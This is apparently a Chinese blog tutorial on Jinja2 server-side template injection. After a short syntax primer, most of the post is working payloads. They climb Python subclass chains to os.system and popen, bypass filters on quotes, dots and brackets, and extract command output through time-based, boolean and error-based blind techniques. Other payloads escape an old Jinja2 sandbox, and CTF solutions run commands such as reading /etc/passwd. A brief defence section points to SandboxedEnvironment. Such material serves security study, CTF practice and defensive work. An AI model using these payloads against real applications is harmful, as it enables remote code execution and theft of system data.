SecMap 系列之 SSTI（jinja2）

SSTI（Server-Side Template Injection）服务端模板注入。

SSTI 其实和编程语言、框架、模板语言都没啥强绑定关系，只是不同编程语言或者模板语言有不同的注入姿势罢了。SSTI 由于涉及到的组件非常多，还和特定组件的利用方式（比如 SSTI + jinja2 和 SecMap - Flask 有很大关系），但是由于篇幅原因应该分开来写，所以我拆的细了一些，本文主要讲 jinja2 的 SSTI。后面还会有其他模板语言、框架的利用介绍，反正慢慢写橘友们慢慢看吧。

注：本文基本上都是 py3.x 的环境。

介绍

既然所谓模板注入，我们就先要了解一下这个“模板”是怎么来的。这与所谓的 MVC（即 Model、View、Controller）息息相关，MVC 要实现的目标是将软件用户界面和业务逻辑分离以使代码可扩展性、可复用性、可维护性、灵活性加强。其中 View 层是界面，Model 层是业务逻辑，Controller 层用来调度 View 层和 Model 层。不过如何正确认识与利用 MVC 指导设计，我们暂时按下不表。

上文所谓的“模板”，简单来说就是一个其中包涵占位变量表示动态的部分的文件，模板文件在经过动态赋值后，返回给用户，可以理解为渲染。那其实就是这里的 V 所经常使用的一种东西。例如在 Python 中，jinja2 是我最为常用的模板语言，基于 jinja2 的组件也有很多，例如 flask，同样是我非常非常喜欢的 Web 框架。

jinja2 语法

依旧推荐官方文档，见资料 1

作为一门模板语言，肯定有自己的一套语法规则。

基础语法

jinja2 的基础语法规则一共 3 种：

1. 控制结构 {% %}，也可以用来声明变量（{% set c = "1" %}）
2. 变量取值 {{ }}，比如输入 1+1，2*2，或者是字符串、调用对象的方法，都会渲染出执行的结果
3. 注释 {# #}
4. 其他：还有些奇奇怪怪的语法，随着版本更新可能会去掉，这部分如果需要就看文档慢慢找

对于这三种语法，看一个例子就懂了：

1
2
3
4
5
6
7
8
9
10
11
12
13
14

from jinja2 import Template
tp = Template('''{#
这是一个注释
#}

{% set c = [5, 6, 7, 8, 9] %}

{% for i in a+c %}
    {% if i % 2 %} {{ i }} {% endif %}
{% endfor %}
''')
print(tp.render(a = [0, 1, 2, 3, 4]))

结果就是输出 1、3、5、7、9

另外，jinja2 还有特殊的语法：

1. 过滤器
2. 模板继承

过滤器

文档见资料 4

过滤器可以理解为是 jinja2 里面内置的函数和字符串处理函数，用于修饰变量。甚至支持参数 range(10)|join(', ')；以及链式调用，只需要在变量后面使用管道符 | 分割，前一个过滤器的输出会作为后一个过滤器的输入，例如，{{ name|striptags|title }} 会移除 HTML Tags，并且进行 title-case 转化，这个过滤器翻译为 Python 的语法就是 title(striptags(name))。

可以看出，过滤器极大丰富了模板的数据处理能力，同时也在后面攻击时发挥了很大的作用 :)

宏

jinja2 内置了很多函数，嗯，非常不错，但是我还是觉得不够，怎么办呢？可以自己编写一个函数，然后在模板中调用，这就是宏（macro）的作用 — 自定义函数：

1
2
3
4
5
6

{% macro hack(name="Macr0phag3") %}
<h1> Hacked by {{ name }} </h1>
{% endmacro %}
<p> {{ hack('Tr0y') }} </p>
<p> {{ hack() }} </p>

macro 后面跟函数名与参数，调用方法也很 Pythonic。

模板继承

文档见资料 5

模板继承允许我们创建一个骨架文件，其他文件从该骨架文件继承。并且还支持针对自己需要的地方进行修改。

jinja2 的骨架文件中，利用 block 关键字表示其包涵的内容可以进行修改。这里直接举例吧：

这个是骨架文件：base.html

1
2
3
4
5
6
7
8
9
10
11
12
13
14

<head>
    {% block head %}
    <title>{% block title %}{% endblock %} - Home</title>
    {% endblock %}
</head>
<body>
    <div id="content">{% block content %}{% endblock %}</div>
    <div id="footer">
        {% block  footer %}
        <script>This is javascript</script>
        {% endblock %}
    </div>
</body>

bbb.html 继承 base.html 的模板：

1
2
3
4
5
6
7
8
9
10
11
12

{% extends "base.html" %}  <!-- 继承 -->
{% block title %} Tr0y's Blog {% endblock %}  <!-- title 自定义 -->
{% block head %}
    {{ super() }}  <!-- 用于获取原有的信息 -->
    <style type='text/css'>
    .important { color: #FFFFFF }
    </style>
{% endblock %}   
 <!-- 其他不修改的原封不动的继承 -->

渲染：

1
2
3
4

from jinja2 import FileSystemLoader, Environment
env = Environment(loader=FileSystemLoader("./"))
print(env.get_template("bbb.html").render())

这里用到了 FileSystemLoader，其实用它的逻辑很简单。我们在 bbb.html 中写了 {% extends "base.html" %}，那 jinja2 怎么知道 base.html 在哪呢？FileSystemLoader 就是用来指定模板文件位置的。同样用途的还有 PackageLoader，它是用来指定搜索哪个 Python 包下的模板文件，以及其他，见资料 6

杂项

去除空格

jinja2 中如果不加换行的话，可读性很差，如果加了的话，渲染后又会有多余的空格。我们可以在标签的前后加上 -，这样就不会有空格了：

1
2
3
4
5
6

{% macro hack(name="Macr0phag3") %}
<h1> Hacked by {{ name }} </h1>
{% endmacro %}
<p> {{- hack('Tr0y') -}} </p>
<p> {{- hack() -}} </p>

SSTI in jinja2

攻击思路

由于模板语法对 Python 语句是有一定程度支持的，所以利用 {% %} 就可以非常轻松地进行攻击，例如：

1
2
3
4
5
6
7

print(
    Template('''
        {% for i in ''.__class__.__mro__[-1].__subclasses__() if i.__name__ == "_wrap_close" %}
            {{ i.__init__.__globals__['system']('whoami') }} 
        {% endfor %}
    ''').render()
)

或者知道 index 的话，直接打：

1
2
3
4
5

print(
    Template(
    ''' {{ ''.__class__.__mro__[-1].__subclasses__()[133].__init__.__globals__['system']("whoami") }}'''
    ).render()
)

这一部分与资料 2 的原理是一样的，这里就不啰嗦了。

有一点需要注意的是，由于这里并不是完全支持 Python 所有的语法，所以很多语法是无法使用的，比如列表推导，如果熟练掌握了 Python 沙箱逃逸的原理，那么你可能会这么写 exp：

1

print(Template('''{{ [i for i in ''.__class__.__mro__[-1].__subclasses__() if i.__name__ == "_wrap_close"][0].__init__.__globals__['system']('whoami') }}''').render())

可惜这是不行的：TemplateSyntaxError: expected token ',', got 'for'，jinja2 并不支持在 {{ }} 里玩 if+推导式。

所以熟练掌握 jinja2 中可以使用的函数、过滤器、语法规则，对于攻击来说是很重要的。这部分推荐去看官方文档（见资料 4）：

以及比如对于 for 循环来说，还有特殊的方法可供在循环块内部使用（见资料 7）

反正不管怎么样，攻击思路受限的时候，官方文档一定是寻找新姿势的最佳途径。

顺便说一下，jinja2 更新之后可能会引入新的过滤器、函数，例如 3.0.2 就没有 items 过滤器，到了 3.1.0 就有了。

更新日志见资料 8

bypass 思路

bypass 字符、数字的通用姿势

最简单的 bypass，按照资料 2 中的思路（[ ] 扣字符拼接、chr 等等）即可（这里面有的姿势我就不列举了，如果不记得的话强烈建议复习一遍）。

其实扣字符可以做的非常细，以至于理论上我们可以扣出所有的字符或者数字（其实还是资料 2 中的思路，姿势很多，以下只举例）：

1. 数字 0：{{ {}|int }}、{{ {}|length }}
2. 数字 1：{{ ({}|int)**({}|int) }}
3. 理论上有了 1 之后就可以搞出所有其他数字，可以用 + 或者是 -+|abs
4. 空格：{{ {}|center|last }}、{1:1}|xmlattr|first
5. <：{}|select|string|first
6. >：{}|select|string|last
7. 点：{{ self|float|string|min }} 或者 c.__lt__|string|truncate(3)|first
8. a-z：{{ range.__doc__ + dict.__doc__}}
9. A-Z：{{ (range.__doc__ + dict.__doc__) | upper }}

上面这种都比较常规，思路还是扣字符的思路，顶多是过滤器做了变化。

这里多说一下利用格式化字符串实现的任意字符构造（例如字符 d）：

1. 首先搞出 %c：{{ {}|string|urlencode|first~(self|string)[16] }}
2. 然后搞出 d：{{ ({}|string|urlencode|first~(self|string)[16]) % 100 }}

还不需要引号。

间接获取内置函数

正如上文说的，jinja2 仅仅支持部分 Python 内置函数，例如 chr 就无法直接使用。

好在我们可以利用资料 2 的手段，获取那些被隐藏的函数，例如 chr，我们可这样：

1
2
3

{{ 
  ().__class__.__base__.__subclasses__()[100].__init__.__globals__["__builtins__"]["chr"]
}}

如果你觉得每次调用都需要这样写，太麻烦了，payload 也冗余，那么结合 {% set ... %} 就可以这么玩：

1
2
3

{% set chr = ().__class__.__base__.__subclasses__()[100].__init__.__globals__["__builtins__"]["chr"]%}
{{ chr(97)+chr(98) }}

那结合宏就可以这么玩：

1
2
3
4
5

{%- macro chr(i) -%}
    ().__class__.__base__.__subclasses__()[100].__init__.__globals__["__builtins__"]["chr"](i)
{%- endmacro -%}
{{ chr(97)+chr(98) }}

当然啦，由于 jinja2 中有自己的一些内置变量等，所以会有一些资料 2 之外的姿势。例如利用 Undefined 实例可以直接拿到 __globals__：

1

{{ x.__init__.__globals__ }}

所以就可以有：

• x.__init__.__globals__.__builtins__
  • x.__init__.__globals__.__builtins__.eval
  • x.__init__.__globals__.__builtins__.exec
• x.__init__.__globals__.sys.modules.os
• x.__init__.__globals__.__builtins__.__import__
• ...

通过查阅源码或者文档可知，默认命名空间自带这几种函数

或者用 self.__dict__._TemplateReference__context 也可以看到。

所以就有：

1. self.__init__.__globals__
2. lipsum.__globals__.os
3. cycler.__init__.__globals__.os
4. joiner.__init__.__globals__.os
5. namespace.__init__.__globals__.os

其实这些随便找个方法都可以搞到 __globals__。那为啥其他的比如 range 就不可以呢？其实在资料 2 中也已经说过了。

过滤 .

按照资料 2 中的思路，如果过滤了 .，我们很容易想到用 getattr 和 __getattribute__：

1. {{ getattr(1, "__class__") }}
2. {{ 1.__getattribute__("__class__") }}

在 jinja2 中，由于 [key] 的特殊性（资料 3）

[key] 和 . 是基本上等价的，只是处理逻辑先后上有区别，. 是先按查找属性执行，再按照用键查字典的值去执行，[key] 则相反。并且还提到，如果想查找属性还可以用 attr。

所以我们就可以这么玩：

1. {{ 1["__class__"] }}
2. {{ 1 | attr("__class__") }}

由于过滤器 map 也支持取属性，所以可以这样：

1
2

# 注意，由于 map 需要一个可迭代对象，所以外面需要套个 [ ]
{{ [1] | map(attribute="__class__")| list | first }}`

过滤 [ ]

分为两种情况：

1. 如果是要取 index，除去资料 2 中的思路（__getitem__、pop 等等）之外，如果是字典，那么利用 bypass 过滤 . 中的结论，可以用 . 来代替 [key]：{{ {"a": 1}.a }}
2. 如果是要构造一个列表，我们一般是给最外面加个 [] 就好了。在中括号被过滤的情况下，则可以使用 slice 来替代。例如 "1"|slice(1)|list 与 [['1']] 是等价的。

过滤 {{ }}

这种情况下寻找其他语法就行了。比如 {% %}。

{% macro %} 就不提了。

{% print(...) %}：

1

{% print(''.__class__.__mro__[-1].__subclasses__()[133].__init__.__globals__['system']("whoami")) %}

还有 {% if %}、{% set %}、{% for %} ... 都是可以执行命令的，只是无回显。如果非要有回显，利用盲注的思想，可以走带外通道。怎么盲注？见资料 2，原理是一样的，这里就不啰嗦了。
比如时间盲注：

1
2
3
4
5

{% if dict.mro()[-1].__subclasses__()[133].__init__.__globals__.popen('sleep $(whoami | cut -c 1 | tr a 1)')|list %}{% endif %}
{% if dict.mro()[-1].__subclasses__()[133].__init__.__globals__.popen('sleep $(whoami | cut -c 1 | tr b 1)')|list %}{% endif %}
...
{% if dict.mro()[-1].__subclasses__()[133].__init__.__globals__.popen('sleep $(whoami | cut -c 1 | tr m 1)')|list %}{% endif %}
# 延时 1s 说明第一个字符是 m

当然这种语法本身也可以盲注，比如布尔盲注：

1
2
3
4

{% if dict.mro()[-1].__subclasses__()[133].__init__.__globals__.popen('whoami').read()[0] == "a" %}yes{% endif %}
...
{% if dict.mro()[-1].__subclasses__()[133].__init__.__globals__.popen('whoami').read()[0] == "m" %}yes{% endif %}
# 输出 yes 说明第一个字符是 m

甚至可以搞基于报错的盲注：

1
2
3
4

{% for i in [1][(dict.mro()[-1].__subclasses__()[133].__init__.__globals__.popen('whoami').read()[0] == "a")] %}{% endfor %}
...
{% for i in [1][(dict.mro()[-1].__subclasses__()[133].__init__.__globals__.popen('whoami').read()[0] == "m")] %}{% endfor %}
# 不报错说明第一个字符是 m

因为对于 jinja2 来说，索引过大是返回 Undefined，不会报错。当然啦，如果把上面的 [1] 换成 [[1]] 就变成了布尔盲注。

限制过滤器或函数

姿势主要有三种：

1. 有些过滤器是可以被替换的，比如 []|string 等同于 []|format。这种方式主要依赖于使用过滤器的目的，不太好列出统一的替换规则，所以我就不一一列举了。熟悉各种过滤器的作用是这种 bypass 的前提。
2. 大部分过滤器可以转为 [] 嵌套 + map() 来使用。例如 []|string 等同于 [[]]|map("str""ing")|list|last。这种姿势相对来说通用，遗憾的是，无法带参数使用过滤器。
3. self.__dict__._TemplateReference__context 中包含了内置的全局函数，可以直接用。

过滤引号

除了用上面提到的常规姿势之外：

创建 dict

这个其实也在资料 2 中提及过。

例如 whoami：

• {{ dict(whoami=x)|join }}
• {{ dict(who=x,ami=x)|join }}
• {{ dict(whoami=x)|list|first }}
• {{ dict(whoami=x)|items|list|first|first }}
• ...

艾玛，真香哎

如果遇到特殊字符，再用常规姿势就好了。

py3.9 新姿势

如果漏洞点无法支持 set，那么挨个字符拼接的 payload 太长了，所以还需要寻找除了用 dict() 的新的优化方式。在 PEP 585（py3.9）中，我找到了新的姿势。

首先需要一个前置知识点：类型注解。如果你没用过 Python 类型注解，建议阅读资料 9

在 PEP 560（py3.7）中，官方新增了 __class_getitem__ 方法，这个方法的功能是按照 key 参数指定的类型返回一个表示泛型类的特殊对象，这样可以支持运行时对泛型类进行参数化，让注解更容易使用：

在 PEP 585（py3.9）中（见资料 10）

进一步对类型注解做了升级，支持通过 __class_getitem__() 来参数化 typing 模块中所有标准的容器类型，这样我们可以将 list 或 dict 直接作为列表和字典的类型注释，而不必依赖 typing.List 或者 typing.Dict。因此，代码现在看起来更加简洁，而且更容易理解和解释。

Python 文档中反复提及“参数化泛型”这个词。PEP 585 也给出了定义：

1

parameterized generic – a specific instance of a generic with the expected types for container elements provided. Also known as a parameterized type. For example: dict[str, int].

最后，Python 中有个，GenericAlias 对象充当泛型类型的代理，实现参数化泛型。对于容器类，提供给该类的参数可指示对象包含的元素的类型。

可支持参数化泛型的类可参考资料 11

到这里，我们就可以发现，打印 list[int] 的结果是 list[int]，它其实是一个 GenericAlias：

那自然，这样也是 ok 的：list["whoami"]，加上 jinja2 的 . 的特殊性，我们就用了一种船新的玩法。比如可以这样执行 whoami，不带有引号：

1

dict.mro()[-1].__subclasses__()[133].__init__.__globals__.system((dict.whoami|string)[6:-2]|join)

不过由于语法的限制，这样是无法加上空格以及特殊字符（/、.、( ) 等）的，所以没法直接带参数或者带一些特殊的字符执行。

所以为了实用一些，例如 cat th1s_1s_a_lo0o0o0o0o0o0o0ng_fl4g，还是得用到其他获取字符的手段，比如 chr：

1
2
3
4
5
6
7
8
9

dict.mro()[-1].__subclasses__()[133].__init__.__globals__.system(
  (
    [( dict.cat |string)[6:-2]|join] + 
    [( dict.th1s_1s_a_lo0o0o0o0o0o0o0ng_fl4g |string)[6:-2]|join]
  )
  | join(
    dict.mro()[-1].__subclasses__()[100].__init__.__globals__.__builtins__.chr(32)
    )
)

长度为 243。

或者是扣字符拼接：

1
2
3
4
5
6

dict.mro()[-1].__subclasses__()[133].__init__.__globals__.system(
  (
    [( dict.cat |string)[6:-2]|join] + 
    [( dict.th1s_1s_a_lo0o0o0o0o0o0o0ng_fl4g |string)[6:-2]|join]
  )
  | join((dict|string)[6]))

这个长度为 181。

利用相同的逻辑，我们可以找出其他 bypass 的姿势，其实都是利用了 __class_getitem__，再想办法把结果变成 str 类型：

1. (dict.whoami|string)[6:-2]|join
2. (dict.whoami|title...
3. (dict.whoami|trim...
4. (dict.whoami|lower...
5. (dict.whoami|center...
6. (dict.whoami|format...
7. (dict.whoami|capitalize...
8. (dict.whoami|indent)[6:-2]|join

下面这些会用到引号，所以可能并不实用：

1. (dict.whoami|string).split("'").pop(-2)
2. (dict.whoami|replace("", "").pop(-2)
3. ("00"|join(dict.whoami)).split("'").pop(-2)
4. (dict.whoami|urlize).split("'").pop(-2)
5. (dict.whoami|urlencode).split("%27").pop(-2)

上面这么多都是类似的逻辑。如果出现过滤器禁用的情况，可以互相做替换。

组合之前的一些技巧，还可以这样：

1. 引号、[ ] 被过滤：(dict.whoamiiii|string|slice(3)|list).pop(1)|join（或者挨个 pop 完之后拼接起来，就是会比较长）
2. 引号、数字、[ ] 被过滤：(dict.whoamiiii|string|slice(True+True+True)|list).pop(True)|join

下面这些可能都不实用，但是作为技巧看一下还是挺有启发的：

1
2
3
4
5
6
7
8

# . 被过滤
([dict]|map(attribute='whoami')|list|string)[7:-3]
# 特定的过滤器被禁用
(([dict.whoamiiii|string]|list|map("sl"+"ice", 3)|list).pop(0)|list).pop(1)|join
# [] 被过滤 + 特定的过滤器被禁用
(((""|slice(1,fill_with=(dict.whoamiiii|string))|list).pop()|map("sl"+"ice", 3)|list).pop(0)|list).pop(1)|join

自然，这个技巧只有 > py3.9 才可以使用。

从上面可以看出，这个姿势要实用，很依赖 .，如果这个被干掉了那就要换其他的姿势了。

利用 jinja2 + flask 组合 bypass

jinja2 最常见的搭档就是 flask 了。由于 flask 会引入新的变量，所以也会引入新的姿势。这一部分正如本文开头所述，jinja2 的 SSTI 与 Flask 关联紧密，这一部分我放在了 《SecMap - Flask》 中。

jinja2 沙盒绕过

实际上，jinja2 有自带的，独立于 Python 的沙盒环境。默认沙盒环境在解析模板时会检查所操作的属性，这种检查是运行时的检查，绕过是比较困难的。也就是说即使模板内容被用户所控制，也是无法绕过沙盒执行代码或者获取敏感信息的。

但在历史上，jinja2 < v2.8.1 由于没有考虑到 format 可触发字符串格式化漏洞，导致沙盒可以被绕过：

1
2
3
4

from jinja2.sandbox import SandboxedEnvironment
env = SandboxedEnvironment()
print(env.from_string("""{{ '{0.__class__.__base__}'.format([]) }}""").render())

在攻击之外

上面所述的思路，都是局限在 Template 中的，因为我们要思考攻击场景，没有攻击场景的 payload 用处是很有限的。

但是，如果我们在写一些自动化的脚本，用来扫描或者是搜索变量，难免也会用到一些内置函数（例如 dir），通过上面这些思路利用 SSTI 去获取内置函数当然是可以的，但其实 render 本身是可以指定参数传递给模板使用的，所以不限于攻击，可以这样：

1

Template("{{ dir(self) }}").render(dir=dir)

另外再说一嘴，render 返回的固定是字符串，如果我们想获取变量示例，如果是个字符串或者列表之类的基本类型，那倒简单，直接 eval 下就好。如果是简单一些示例，可以考虑用 pickle 来玩。但是如果是一些非常规的实例，应该怎么拿到呢？例如 self 这个内置变量：

1
2
3

In [20]: Template1("{{ pickle.dumps(self) }}").render(pickle=pickle)
...
TypeError: cannot pickle 'module' object

这个时候我们其实可以通过 __main__ 来存储模板里的变量，这个办法应该是最完美的了：

1
2
3
4
5
6
7

In [25]: Template(
    ...:     "{{ setattr(__import__('__main__'), 'result', self) }}"
    ...: ).render(setattr=setattr, __import__=__import__)
Out[25]: 'None'
In [26]: result
Out[26]: <TemplateReference None>

防御

防御这种漏洞肯定不能用关键字过滤，Python 实在是太灵活了。

如果可以的话，还是不要让模板对用户可控了。

如果一定要有这种需求，还是得用 SandboxedEnvironment：

1
2
3
4

from jinja2.sandbox import SandboxedEnvironment
env = SandboxedEnvironment()
print(env.from_string("""{{ [].__class__.__base__ }}""").render())

对于未注册的属性访问都会抛出错误：SecurityError: access to attribute xxx of xxx object is unsafe.，下面这些都是凉凉的：

1. [].__class__.__base__
2. []["__class__"]["__base__"]
3. []["__class__"]["__base__"]
4. dict.mro()
5. self.__dict__._TemplateReference__context
6. ...

但是通过一些变量来拿敏感信息，还是有搞头的，我们后面再讲。

资料

1. jinja2 官方文档
   https://jinja.palletsprojects.com/en/3.1.x/templates/#synopsis
2. Python 沙箱逃逸经验总结：
   https://www.tr0y.wang/2019/05/06/Python沙箱逃逸经验总结/
3. jinja2 - getattr
   https://jinja.palletsprojects.com/en/3.1.x/templates/?highlight=getattr#variable
4. jinja2 - builtin-filters
   https://jinja.palletsprojects.com/en/3.1.x/templates/#builtin-filters
5. jinja2 - 模板继承
   https://jinja.palletsprojects.com/en/3.1.x/templates/#template-inheritance
6. jinja2 - PackageLoader
   https://jinja.palletsprojects.com/en/3.1.x/api/?highlight=packageloader#loaders
7. jinja2 - for
   https://jinja.palletsprojects.com/en/3.1.x/templates/#for
8. jinja2 - changes
   https://jinja.palletsprojects.com/en/3.1.x/changes/
9. Python 类型注解
   https://www.gairuo.com/p/python-type-annotations
10. pep-0585
    https://peps.python.org/pep-0585/#implementation
11. standard generic classes
    https://docs.python.org/zh-cn/3/library/stdtypes.html#standard-generic-classes

附

OrangeKiller CTF 第 1 期题解

jinjia2 se

1
2
3
4
5
6

import jinja2
input_payload = '''''.__class__.__mro__[-1].__subclasses__()[133].__init__.__globals__['system']()'''
print(jinja2.Template("{{"+input_payload+"}}").render())

jinjia2 plus

1
2
3
4
5
6
7
8
9

import jinja2
input_payload = '''[whoami].__class__.__mro__[-1].__subclasses__()[133].__init__.__globals__.system(().__class__.__base__.__subclasses__()[100].__init__.__globals__.__builtins__.chr(119)+().__class__.__base__.__subclasses__()[100].__init__.__globals__.__builtins__.chr(104)+().__class__.__base__.__subclasses__()[100].__init__.__globals__.__builtins__.chr(111)+().__class__.__base__.__subclasses__()[100].__init__.__globals__.__builtins__.chr(97)+().__class__.__base__.__subclasses__()[100].__init__.__globals__.__builtins__.chr(109)+().__class__.__base__.__subclasses__()[100].__init__.__globals__.__builtins__.chr(105))'''
if "'" in input_payload or '"' in input_payload:
    raise RuntimeError("Oh, Hacker!") 
print(jinja2.Template("{{"+input_payload+"}}").render())

jinjia2 pro

1
2
3
4
5
6
7
8
9

import jinja2
input_payload = '''[whoami].__class__.__mro__[-1].__subclasses__()[133].__init__.__globals__.system(dict(whoami=x)|join)'''
if "'" in input_payload or '"' in input_payload and len(input_payload) > 500:
    raise RuntimeError("Oh, Hacker!") 
print(jinja2.Template("{{"+input_payload+"}}").render())

jinjia2 pro max

1
2
3
4
5
6
7
8
9

import jinja2
input_payload = '''[whoami].__class__.__mro__[-1].__subclasses__()[133].__init__.__globals__.system((dict(cat=x)|join)+dict.mro()[-1].__subclasses__()[100].__init__.__globals__.__builtins__.chr(32)+dict.mro()[-1].__subclasses__()[100].__init__.__globals__.__builtins__.chr(47)+dict(etc=x,passwd=x)|join(dict.mro()[-1].__subclasses__()[100].__init__.__globals__.__builtins__.chr(47)))'''
if "'" in input_payload or '"' in input_payload and len(input_payload) > 500:
    raise RuntimeError("Oh, Hacker!") 
print(jinja2.Template("{{"+input_payload+"}}").render())

这个 payload 应该还有优化的空间，留给橘友们研究吧~

当然，上面这几题用 1}} {{ payload }} {{1` 这样来闭合外层的 `{{ }}，再用 {% set %} 之类的也是 ok 的。

SSTI 这个系列的知识点真是越整理越多
罢了，拖更就好了

开摆！